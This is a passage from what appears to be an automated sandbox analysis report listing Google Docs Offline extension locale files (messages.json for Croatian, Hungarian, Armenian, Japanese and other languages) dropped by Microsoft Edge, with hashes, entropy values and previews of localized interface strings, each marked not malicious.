File Type:	JSON data
Category:	dropped
Size (bytes):	935
Entropy (8bit):	4.6369398601609735
Encrypted:	false
SSDEEP:	24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
MD5:	25CDFF9D60C5FC4740A48EF9804BF5C7
SHA1:	4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
SHA-256:	73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
SHA-512:	EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1065
Entropy (8bit):	4.816501737523951
Encrypted:	false
SSDEEP:	24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
MD5:	8930A51E3ACE3DD897C9E61A2AEA1D02
SHA1:	4108506500C68C054BA03310C49FA5B8EE246EA4
SHA-256:	958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
SHA-512:	126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\hy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2771
Entropy (8bit):	3.7629875118570055
Encrypted:	false
SSDEEP:	48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
MD5:	55DE859AD778E0AA9D950EF505B29DA9
SHA1:	4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
SHA-256:	0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
SHA-512:	EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
Malicious:	false
Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.6457079159286545
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
MD5:	CAEB37F451B5B5E9F5EB2E7E7F46E2D7
SHA1:	F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
SHA-256:	943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
SHA-512:	A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1895
Entropy (8bit):	4.28990403715536
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
MD5:	38BE0974108FC1CC30F13D8230EE5C40
SHA1:	ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
SHA-256:	30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
SHA-512:	7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
